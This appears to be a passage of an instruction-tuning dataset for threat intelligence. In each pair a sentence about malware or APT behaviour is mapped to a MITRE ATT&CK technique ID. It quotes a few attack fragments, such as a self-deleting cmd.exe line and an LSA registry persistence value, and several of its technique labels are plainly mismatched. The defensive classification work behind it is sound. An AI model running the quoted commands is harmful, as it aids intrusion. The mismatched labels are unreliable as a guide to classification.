framework.,Malefactors used watering hole attacks to compromise legitimate and trusted websites frequently visited by their targets### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,4H RAT has the capability to obtain a listing of running processes .### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KillDisk overwrites the first sector of the Master Boot Record with “0x00”.### Assistant: T1561: Disk Wipe" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has bypassed MFA set on OWA accounts by generating a cookie value from a previously stolen secret key.### Assistant: T1606: Forge Web Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mitigation Security and system/IT administrators must practice due diligence in protecting their websites and web-based applications from threats that can undermine their security, and hijack them to do the bad guys’ bidding—delivering malware to their victims### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The “VPN Client” is a legitimate Juniper VPN software bundled with Helminth,  a malware in use by the OilRig threat agnet: JuniperSetupClientInstaller.exe 6a65d762fb548d2dc56cfde4842a4d3c (VirusTotal link) If the victim downloads and installs the file, their computer would get infected, while the legitimate VPN software is installed### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 used WMI for the remote execution of files for lateral movement.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bankshot leverages a known zero-day vulnerability in Adobe Flash to execute the implant into the victims’ machines.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Nebulae has the ability to use CreateProcess to execute a process.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zebrocy identifies network drives when they are added to victim systems.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may add login items to execute upon user login to gain persistence or escalate privileges.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Since macOS Catalina 10.15, kernel extensions have been deprecated on macOS systems.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo can enumerate all windows on the victim’s machine.### Assistant: T1010: Application Window Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.### Assistant: T1525: Implant Internal Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,xCaon has used Base64 to encode its C2 traffic.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Second, the threat actors exploit CVE-2017-8570 to achieve code execution via a malicious “scriptlet” file, or .sct file, which is also embedded in the malicious RTF document### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has exploited the Office vulnerability CVE-2017-0199 for execution.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also fragment files across the existing file system structure in non-standard ways.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a ""refresh"" token enabling background access is awarded.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Security tools may make dynamic changes to system components in order to maintain visibility into specific events.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KGH_SPY can collect information on installed applications.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA551 has used regsvr32.exe to load malicious DLLs.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has gained access to credentials via exported copies of the ntds.dit Active Directory database.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,REvil can download a copy of itself from an attacker controlled IP address to the victim machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These applications are often websites, but can include databases , standard services or SSH, network device administration and management protocols , and any other applications with Internet accessible open sockets, such as web servers and related services.### Assistant: T1190: Exploit Public-Facing Application" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system.### Assistant: T1187: Forced Authentication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The username appears to be attacker specified and has occurred in 2017 Bankshot samples### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RDFSNIFFER hooks several Win32 API functions to hijack elements of the remote system management user-interface.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CoinTicker initially downloads a hidden encoded file.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.### Assistant: T1561: Disk Wipe" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT37 uses steganography to send images to users that are embedded with shellcode.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bisonal's dropper creates VBS scripts on the victim’s machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pseudo-HTTP Protocol Messages for the pseudo-HTTP protocol are delimited with the ‘|’ character### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WINDSHIELD can gather the victim user name.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has stored captured credential information in a file named pi.log.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sykipot may use netstat -ano to display active network connections.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hydraq C2 traffic is encrypted using bitwise NOT and XOR operations.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 has used TightVNC to control compromised hosts.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Created email accounts can also be used in the acquisition of infrastructure .### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windows API functions such as GetLocaleInfoW can also be used to determine the locale of the host.### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FYAnti can download additional payloads to a compromised host.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RawPOS encodes credit card data it collected from the victim with XOR.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist depending on the specific OS or distribution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gazer can execute a task to download a file.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse Compiled HTML files to conceal malicious code.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This is now a deprecated mechanism in macOS in favor of Launchd.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has deployed XMRig Docker images to mine cryptocurrency.### Assistant: T1496: Resource Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework., Go2Assist ### Assistant: T1219: Remote Access Software" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VERMIN saves each collected file with the automatically generated format {0:dd-MM-yyyy}.txt .### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has used stolen credentials to connect to the victim's network via VPN.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A variant of Elise executes dir C:\progra~1 when initially run.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control address.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token.### Assistant: T1111: Two-Factor Authentication Interception" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windows contains accessibility features that may be launched with a key combination before a user has logged in .### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework., tasklist ### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Power Loader overwrites Explorer’s Shell_TrayWnd extra window memory to redirect execution to a NTDLL function that is abused to assemble and execute a return-oriented programming chain and create a malicious thread within Explorer.exe.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These scans can also be performed in various ways, including using native features of network protocols such as ICMP.### Assistant: T1595: Active Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbon creates several tasks for later execution to continue persistence on the victim’s machine.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Janicab used a cron job for persistence on Mac devices.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 established persistence using Registry Run keys, both to execute PowerShell and VBS scripts as well as to execute their backdoor directly.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The actors also searched for documents based on a specific date range and attempted to identify all installed software on a victim.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM has resolved Pony C2 server IP addresses by either converting Bitcoin blockchain transaction data to specific octets, or accessing IP addresses directly within the Namecoin blockchain.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Babuk can enumerate disk volumes, get disk information, and query service status.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,* User accounts start with a RID of 1,000+.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can send C2 communications with XOR encryption.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An example of this is use of Rundll32 to load a specifically crafted DLL which loads an auto-elevated Component Object Model object and performs a file operation in a protected directory which would typically require elevated access.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 has used scheduled tasks to establish persistence for various malware it uses, including downloaders known as HARDTACK and SHIPBREAD and FrameworkPOS.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It can also steal tokens to acquire administrative privileges.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at system boot.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ with the key value of ""Authentication Packages""=<target binary>.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot has spread through emails with malicious attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Spearphishing may also involve social engineering techniques, such as posing as a trusted source.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The public IP is then POSTed along with OS Version, Internal IP, Machine Name, Domain Name, UserName after being encrypted to the previously chosen URL to register a new victim### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,File is dropped to C:\Users\%USERNAME%\AppData\Roaming\Microsoft Network\microsoft_network\1.0.0.0\microsoft_network.exe### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Derusbi is capable of logging keystrokes.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Web shells are heavily relied on for nearly all stages of the attack lifecycle### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dridex can use multiple layers of proxy servers to hide terminal nodes in its infrastructure.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoisonIvy creates a backdoor through which remote attackers can steal system information.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM can obtain the victim username and permissions.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Phishing can be targeted, known as spearphishing.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bankshot grabs a user token using WTSQueryUserToken and then creates a process by impersonating a logged-on user.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gather email addresses that can be used during targeting.### Assistant: T1589: Gather Victim Identity Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Avaddon has used the Windows Crypto API to generate an AES key.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has tested malware samples to determine AV detection and subsequently modified the samples to ensure AV evasion.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The White Company has performed anti-analysis checks to determine if its malware was in a debugging environment.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fysbis has masqueraded as the rsyncd and dbus-inotifier services.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SHUTTERSPEED can capture screenshots.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbanak performs desktop video recording and captures screenshots of the desktop and sends it to the C2 server.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Trojan.Karagany can secure C2 communications with SSL and TLS.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pisloader has a command to upload a file to the victim machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service .### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Then, they can send a link through Spearphishing Link to the target user to entice them to grant access to the application.### Assistant: T1528: Steal Application Access Token" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cadelle and Chafer are most active during the day time within Iran’s time zone and primarily operate during Iran’s business week (Saturday through Thursday)### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SeaDuke C2 traffic is base64-encoded.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DustySky has exfiltrated data to the C2 server.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ke3chang performs local network connection discovery using netstat.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also assign mailbox folder permissions through individual folder permissions or roles.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VERMIN collects keystrokes from the victim machine.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Azorult can check for installed software on the system under the Registry key Software\Microsoft\Windows\CurrentVersion\Uninstall.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Most cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rover automatically searches for files on local drives based on a predefined list of file extensions.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emotet has been observed dropping password grabber modules including Mimikatz.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Molerats has sent phishing emails with malicious Microsoft Word and PDF attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BoxCaon can collect the victim's MAC address by using the GetAdaptersInfo API.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSTATS can retrieve usernames from compromised hosts.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla and its RPC backdoors have used APIs calls for various tasks related to subverting AMSI and accessing then executing commands through RPC and/or named pipes.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can gather information on the mapped drives, OS version, computer name, DEP policy, memory size, and system volume serial number.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This phase will often leverage a specialized tool that automatically collects a wide array of information including credentials, group management policies, and even system logs to better hone further attacks and assure execution of their malware### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lokibot has used VBS scripts and XLS macros for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also used compressed or archived scripts, such as JavaScript.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,cmd.exe /C choice /C Y /N /D Y /T 2 & Del After sleeping, the Trojan will create a GUID and write it to %APPDATA%\Windows\GDI.bin### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif has used CreateProcessW to create child processes.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GreyEnergy enumerates all Windows services.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DCShadow may be used to create a rogue Domain Controller .### Assistant: T1207: Rogue Domain Controller" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RedLeaves can delete specified files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper has hidden payloads in Flash directories and fake installer files.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gorgon Group malware can download a remote access tool, ShiftyBug, and inject into another process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork used Base64 to encode C2 traffic.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silent Librarian has obtained free Let's Encrypt SSL certificates for use on their phishing pages.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A gh0st RAT variant has used rundll32 for execution.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has used a modified version of pentesting script wmiexec.vbs, which logs into a remote machine using WMI.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Egregor can perform a language check of the infected system and can query the CPU information .### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADFLICK has compressed data using the aPLib compression library.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may search connected removable media on computers they have compromised to find files of interest.### Assistant: T1025: Data from Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ixeshe collects the computer name of the victim's system during the initial infection.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Goopy has the ability to disable Microsoft Outlook's security policies to disable macro warnings.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADFLICK has searched for files on the infected host.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,What does the resulting watering hole look like? The websites were compromised to redirect visitors to instances of both ScanBox and BEeF### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sharpshooter's first-stage downloader was a VBA macro.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These private keys can be used to authenticate to Remote Services like SSH or for use in decrypting other collected files such as email.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sensitive data can be collected from remote systems via shared network drives that are accessible from the current system prior to Exfiltration.### Assistant: T1039: Data from Network Shared Drive" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 removed evidence of email export requests using Remove-MailboxExportRequest.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Volatile Cedar has performed vulnerability scans of the target server.### Assistant: T1595: Active Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The backdoor will modify the registry for the Windows Media Player to store its C&C configuration.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Both utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: ComRegisterFunction or ComUnregisterFunction respectively.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Micropsia creates a new hidden directory to store all components' outputs in a dedicated sub-folder for each.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Valak can communicate over multiple C2 hosts.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OLDBAIT can use HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GrimAgent can pad C2 messages with random generated values.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may impair command history logging to hide commands they run on a compromised system.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona.### Assistant: T1586: Compromise Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork has created self-signed certificates from fictitious and spoofed legitimate software companies that were later used to sign malware.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MacSpy uses Tor for command and control.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They may also search for VME artifacts before dropping secondary or additional payloads.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet enumerates the currently running processes related to a variety of security products.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Accounts may be created on the local system or within a domain or cloud tenant.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BoxCaon has used Windows API calls to obtain information about the compromised host.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8 has used malicious e-mail attachments to lure victims into executing malware.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To perform Network DoS attacks several aspects apply to multiple methods, including IP address spoofing, and botnets.### Assistant: T1498: Network Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse a valid Kerberos ticket-granting ticket or sniff network traffic to obtain a ticket-granting service ticket that may be vulnerable to Brute Force.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NanoCore uses DES to encrypt the C2 traffic.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 has used compromised identities to access VPNs and remote access tools.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JPIN can list running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BadPatch collects the OS system, OS version, MAC address, and the computer name from the victim’s machine.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The first link was labeled as ""Comparison of Major Tasks in '16 & '17"" and the second link was identified as ""Comparison between '16 & '17"".Upon opening these links the user was presented with a further decoy Hangul document### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.### Assistant: T1197: BITS Jobs" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has used e-mail to send exfiltrated data to C2 servers.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Doki has used the embedTLS library for network communications.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hancitor has used malicious Microsoft Word documents, sent via email, which prompted the victim to enable macros.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla RPC backdoors have included local UPnP RPC proxies.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Industroyer’s data wiper module clears registry keys and overwrites both ICS configuration and Windows files.### Assistant: T1485: Data Destruction" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TURNEDUP is capable of gathering system information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CrossRAT creates a Launch Agent on macOS.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may modify pluggable authentication modules to access user credentials or 